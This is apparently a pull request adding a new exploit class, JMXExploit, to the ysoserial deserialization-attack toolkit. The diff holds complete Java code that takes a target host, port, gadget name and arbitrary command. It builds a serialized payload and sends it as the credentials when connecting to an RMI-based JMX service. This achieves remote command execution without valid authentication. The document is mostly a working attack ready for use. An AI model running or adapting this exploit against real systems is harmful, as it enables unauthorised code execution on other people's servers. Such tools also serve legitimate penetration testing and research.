### PR TITLE
Add exploit JMXExploit

### DIFF
--- a/src/main/java/ysoserial/exploit/JMXExploit.java
+++ b/src/main/java/ysoserial/exploit/JMXExploit.java
@@ -1,0 +1,35 @@
+package ysoserial.exploit;
+
+import javax.management.remote.JMXConnector;
+import javax.management.remote.JMXConnectorFactory;
+import javax.management.remote.JMXServiceURL;
+import java.util.HashMap;
+import java.util.Map;
+
+import ysoserial.payloads.ObjectPayload.Utils;
+
+/**
+ * Utility program for exploiting RMI based JMX services running with required gadgets available in their ClassLoader.
+ * Attempts to exploit the service by authentication, passing the payload as argument.
+ * It also works even no authentication is required.
+ *
+ * @author MitAh
+ */
+
+public class JMXExploit {
+
+    public static void main(String[] args) throws Exception {
+        final String host = args[0];
+        final int port = Integer.parseInt(args[1]);
+        final String command = args[3];
+
+        Object payloadObject = Utils.makePayloadObject(args[2], args[3]);
+
+        JMXServiceURL url = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + host + ":" + port + "/jmxrmi");
+        System.out.println("URL: " + url + ", connecting");
+        Map env = new HashMap();
+        env.put(JMXConnector.CREDENTIALS, payloadObject);
+        JMXConnector c = JMXConnectorFactory.connect(url, env);
+        // System.out.println("Connected: " + c.getConnectionId());
+    }
+}


### PR DESCRIPTION
Attempts to exploit a JMX Server by the authentication feature, passing the payload as argument.
It also works even no authentication is required.